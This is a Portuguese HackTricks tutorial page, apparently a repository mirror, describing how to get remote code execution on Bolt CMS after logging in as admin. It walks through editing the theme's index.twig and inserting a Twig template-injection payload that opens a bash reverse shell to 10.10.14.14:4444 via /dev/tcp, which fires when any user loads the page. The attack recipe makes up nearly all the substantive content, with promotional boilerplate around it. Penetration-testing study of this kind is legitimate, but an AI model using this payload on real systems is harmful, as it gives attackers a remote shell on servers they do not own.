mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-28 15:41:34 +00:00
3.4 KiB
3.4 KiB
Bolt CMS
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você deseja ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Confira os PLANOS DE ASSINATURA!
- Adquira o swag oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @carlospolopm.
- Compartilhe seus truques de hacking enviando PRs para os HackTricks e HackTricks Cloud repositórios do github.
RCE
Após fazer login como admin (vá para /bot para acessar o prompt de login), você pode obter RCE no Bolt CMS:
- Selecione
Configuração->Visualizar Configuração->Configuração Principalou vá para o caminho URL/bolt/file-edit/config?file=/bolt/config.yaml - Verifique o valor do tema
- Selecione
Gerenciamento de Arquivos->Visualizar e editar templates - Selecione a base do tema encontrada no passo anterior (
base-2021neste caso) e selecioneindex.twig - No meu caso, isso está no caminho URL /bolt/file-edit/themes?file=/base-2021/index.twig
- Defina seu payload neste arquivo via injeção de template (Twig), como:
{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}} - E salve as alterações
- Limpe o cache em
Manutenção->Limpar o cache - Acesse novamente a página como um usuário regular, e o payload deve ser executado
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você deseja ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Confira os PLANOS DE ASSINATURA!
- Adquira o swag oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @carlospolopm.
- Compartilhe seus truques de hacking enviando PRs para os HackTricks e HackTricks Cloud repositórios do github.